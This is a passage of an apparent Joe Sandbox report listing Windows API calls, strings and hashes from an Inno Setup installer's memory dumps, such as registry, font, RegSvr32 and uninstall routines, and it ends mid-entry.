                                                                                                            • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
                                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
                                                                                                            • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
                                                                                                            • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
                                                                                                            • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Delete$EnableItem$System
                                                                                                            • String ID:
                                                                                                            • API String ID: 3985193851-0
                                                                                                            • Opcode ID: 02d38efaefe46f0e9bc3abe3cfd80dc8f7ad5e6e4bcf4392d2612e5af0a0388e
                                                                                                            • Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
                                                                                                            • Opcode Fuzzy Hash: 02d38efaefe46f0e9bc3abe3cfd80dc8f7ad5e6e4bcf4392d2612e5af0a0388e
                                                                                                            • Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C
                                                                                                            APIs
                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfileStringWrite
                                                                                                            • String ID: $pI$.tmp$MoveFileEx$NUL$WININIT.INI$[rename]$oI
                                                                                                            • API String ID: 390214022-3415521383
                                                                                                            • Opcode ID: 4cfdaec4cf45cb6b31dd2cede704c04f2930a939beeeeed92986428e7fe6f80d
                                                                                                            • Instruction ID: ce58c644a57a5931bfb3eb4b41fd184989c95ed3aef939848703120becc63cdc
                                                                                                            • Opcode Fuzzy Hash: 4cfdaec4cf45cb6b31dd2cede704c04f2930a939beeeeed92986428e7fe6f80d
                                                                                                            • Instruction Fuzzy Hash: 22910734E0010DABDB11EFA5C852BDEB7B5EF49346F508467E800B7392D778AE498B58
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(10000000), ref: 0047FFC4
                                                                                                            • FreeLibrary.KERNEL32(02390000), ref: 0047FFD8
                                                                                                            • SendNotifyMessageA.USER32(0001043A,00000496,00002710,00000000), ref: 0048004A
                                                                                                            Strings
                                                                                                            • Not restarting Windows because Setup is being run from the debugger., xrefs: 0047FFF9
                                                                                                            • Restarting Windows., xrefs: 00480025
                                                                                                            • Deinitializing Setup., xrefs: 0047FE3A
                                                                                                            • DeinitializeSetup, xrefs: 0047FED5
                                                                                                            • GetCustomSetupExitCode, xrefs: 0047FE79
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeLibrary$MessageNotifySend
                                                                                                            • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                                            • API String ID: 3817813901-1884538726
                                                                                                            • Opcode ID: 3e65ccf6202abbdfd793ce9802210bad3c829859d96f97b0f1010f0964bcdbc0
                                                                                                            • Instruction ID: a364eb3419ca1f30a9e3eb44d73b76d56ae546640220791ead322ba595580ec3
                                                                                                            • Opcode Fuzzy Hash: 3e65ccf6202abbdfd793ce9802210bad3c829859d96f97b0f1010f0964bcdbc0
                                                                                                            • Instruction Fuzzy Hash: C351A1316002009FD721EB69F945B5A7BE4EB1A314F51847BF805C73A2DB389848CB99
                                                                                                            APIs
                                                                                                            • SHGetMalloc.SHELL32(?), ref: 00460DEF
                                                                                                            • GetActiveWindow.USER32 ref: 00460E53
                                                                                                            • CoInitialize.OLE32(00000000), ref: 00460E67
                                                                                                            • SHBrowseForFolder.SHELL32(?), ref: 00460E7E
                                                                                                            • CoUninitialize.OLE32(00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460E93
                                                                                                            • SetActiveWindow.USER32(?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EA9
                                                                                                            • SetActiveWindow.USER32(?,?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EB2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                                            • String ID: A
                                                                                                            • API String ID: 2684663990-3554254475
                                                                                                            • Opcode ID: 2477b1493d95c66d93d73e99a730f240e77ae973ab02a92069b792ba0dab2901
                                                                                                            • Instruction ID: e80b4c5213709972e599e89028d95aa00c835143d3680f9f001b64d6594dadc3
                                                                                                            • Opcode Fuzzy Hash: 2477b1493d95c66d93d73e99a730f240e77ae973ab02a92069b792ba0dab2901
                                                                                                            • Instruction Fuzzy Hash: 8C3130B0D00218AFDB01EFB6D885A9EBBF8EB09304F51447AF914F7251E7789A04CB59
                                                                                                            APIs
                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5,?,?,00000000,00471F1C), ref: 004719BC
                                                                                                              • Part of subcall function 0042CD60: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CDD6
                                                                                                              • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5), ref: 00471A33
                                                                                                            • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000), ref: 00471A39
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                                            • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                                            • API String ID: 884541143-1710247218
                                                                                                            • Opcode ID: 166f044b85d341f0b6ee90afdeb19f2146d980d02c7b22180f5b46b241ce676d
                                                                                                            • Instruction ID: 88fb20351202849850a9607c8ed9a5972d7e7c37514b441dc4b5c3053575b9e2
                                                                                                            • Opcode Fuzzy Hash: 166f044b85d341f0b6ee90afdeb19f2146d980d02c7b22180f5b46b241ce676d
                                                                                                            • Instruction Fuzzy Hash: 8111E2307005147BD711EA6ECC82B9E73ACDB45714FA1813BB405B72E1DB3C9E02865C
                                                                                                            APIs
                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,00401B68), ref: 00401ABD
                                                                                                            • LocalFree.KERNEL32(00773D48,00000000,00401B68), ref: 00401ACF
                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,00773D48,00000000,00401B68), ref: 00401AEE
                                                                                                            • LocalFree.KERNEL32(00772D98,?,00000000,00008000,00773D48,00000000,00401B68), ref: 00401B2D
                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B58
                                                                                                            • RtlDeleteCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B62
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                            • String ID: H=w$l3w
                                                                                                            • API String ID: 3782394904-1292453710
                                                                                                            • Opcode ID: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
                                                                                                            • Instruction ID: 4ef907ce7de5879ae286245a644ba6b68361dc01c28fd2a698a6758b772d8c96
                                                                                                            • Opcode Fuzzy Hash: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
                                                                                                            • Instruction Fuzzy Hash: C9114270A403405AEB15AB659C89B263BE597A570CF54407BF80067AF2D7BC5860C7EF
                                                                                                            APIs
                                                                                                            • GetProcAddress.KERNEL32(02390000,inflateInit_), ref: 0045C9DD
                                                                                                            • GetProcAddress.KERNEL32(02390000,inflate), ref: 0045C9ED
                                                                                                            • GetProcAddress.KERNEL32(02390000,inflateEnd), ref: 0045C9FD
                                                                                                            • GetProcAddress.KERNEL32(02390000,inflateReset), ref: 0045CA0D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc
                                                                                                            • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                                            • API String ID: 190572456-3516654456
                                                                                                            • Opcode ID: 311722acbfa37a17bdf68912e4e87f1f7738553d6cb20796f4da0de6e3995170
                                                                                                            • Instruction ID: ca09fd674ca76a7276795bdcbb2c408d45c762c24a12309d3e7b68c52f970bbc
                                                                                                            • Opcode Fuzzy Hash: 311722acbfa37a17bdf68912e4e87f1f7738553d6cb20796f4da0de6e3995170
                                                                                                            • Instruction Fuzzy Hash: A7011AB0901304DEEB14DF36BEC97273AA5E760B56F14D03B9C55992A2D7780848CB9C
                                                                                                            APIs
                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041A9C9
                                                                                                            • 73A24D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
                                                                                                            • SetBkColor.GDI32(?,?), ref: 0041AA18
                                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
                                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
                                                                                                            • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
                                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
                                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
                                                                                                            • SetBkColor.GDI32(00000000,?), ref: 0041AAD3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$StretchText
                                                                                                            • String ID:
                                                                                                            • API String ID: 2984075790-0
                                                                                                            • Opcode ID: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
                                                                                                            • Instruction ID: 2bdc14f7f78cb6bf094045e191087cf2cdbf471e5afceb3518b79a0be2d35765
                                                                                                            • Opcode Fuzzy Hash: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
                                                                                                            • Instruction Fuzzy Hash: 4E61E5B5A00105EFCB40EFADD985E9AB7F8AF08354B10816AF508DB261CB34ED44CF68
                                                                                                            APIs
                                                                                                              • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00457470,?, /s ",?,regsvr32.exe",?,00457470), ref: 004573E2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseDirectoryHandleSystem
                                                                                                            • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                                            • API String ID: 2051275411-1862435767
                                                                                                            • Opcode ID: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
                                                                                                            • Instruction ID: cb1a7ae3e697987e935249ccafc7b98f7c309c2d79f12e82178ec20c33fcefbe
                                                                                                            • Opcode Fuzzy Hash: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
                                                                                                            • Instruction Fuzzy Hash: 73410670A043086BDB10EFD5D841B9DBBF9AF45305F50407BA918BB292D7789A09CB59
                                                                                                            APIs
                                                                                                            • OffsetRect.USER32(?,00000001,00000001), ref: 0044C9FD
                                                                                                            • GetSysColor.USER32(00000014), ref: 0044CA04
                                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0044CA1C
                                                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA45
                                                                                                            • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044CA4F
                                                                                                            • GetSysColor.USER32(00000010), ref: 0044CA56
                                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0044CA6E
                                                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA97
                                                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CAC2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$Color$Draw$OffsetRect
                                                                                                            • String ID:
                                                                                                            • API String ID: 1005981011-0
                                                                                                            • Opcode ID: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
                                                                                                            • Instruction ID: cbf23e484866fe7d62e86adeccfbc8e31d2d10e105370748ca703b53abdb5865
                                                                                                            • Opcode Fuzzy Hash: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
                                                                                                            • Instruction Fuzzy Hash: 6821EFB42015047FC710FB2ACC8AE8B7BDCDF19319B01457A7918EB393C678DD408669
                                                                                                            APIs
                                                                                                              • Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                                                              • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 004949E1
                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 004949F5
                                                                                                            • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00494A0F
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A1B
                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A21
                                                                                                            • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A34
                                                                                                            Strings
                                                                                                            • Deleting Uninstall data files., xrefs: 00494957
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                                            • String ID: Deleting Uninstall data files.
                                                                                                            • API String ID: 1570157960-2568741658
                                                                                                            • Opcode ID: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
                                                                                                            • Instruction ID: d482532eb754b17a04c62f956e406d56ab6d113e5f4ee6e28585aa8da354e785
                                                                                                            • Opcode Fuzzy Hash: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
                                                                                                            • Instruction Fuzzy Hash: 0E219170344204AEEB10EBBAFD42F1737A8D799718F10003BB5049A2E3D67C9C059B6D
                                                                                                            APIs
                                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                                            • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD,?,?,?,?,00000000), ref: 0046F247
                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD), ref: 0046F25E
                                                                                                            • AddFontResourceA.GDI32(00000000), ref: 0046F27B
                                                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046F28F
                                                                                                            Strings
                                                                                                            • AddFontResource, xrefs: 0046F299
                                                                                                            • Failed to open Fonts registry key., xrefs: 0046F265
                                                                                                            • Failed to set value in Fonts registry key., xrefs: 0046F250
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                                            • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                                            • API String ID: 955540645-649663873
                                                                                                            • Opcode ID: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
                                                                                                            • Instruction ID: 6d7729dfe4f1a7c8b63a61044efa00ce4130ce7f95034744da23bbcbb22f00e6
                                                                                                            • Opcode Fuzzy Hash: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
                                                                                                            • Instruction Fuzzy Hash: CC21B278B402007BDB10EBA6AC52F5E779CDB45704F604077B940EB3C2EA7D9D098A6E
                                                                                                            APIs
                                                                                                              • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                                              • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                                              • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
                                                                                                            • GetVersion.KERNEL32 ref: 00462588
                                                                                                            • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 004625C6
                                                                                                            • SHGetFileInfo.SHELL32(00462664,00000000,?,00000160,00004011), ref: 004625E3
                                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00462601
                                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00462664,00000000,?,00000160,00004011), ref: 00462607
                                                                                                            • SetCursor.USER32(?,00462647,00007F02,00462664,00000000,?,00000160,00004011), ref: 0046263A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                                            • String ID: Explorer
                                                                                                            • API String ID: 2594429197-512347832
                                                                                                            • Opcode ID: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
                                                                                                            • Instruction ID: 5d8862978945b954f1aea40d900f189da683ff410d790468fedd90432f5e16a2
                                                                                                            • Opcode Fuzzy Hash: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
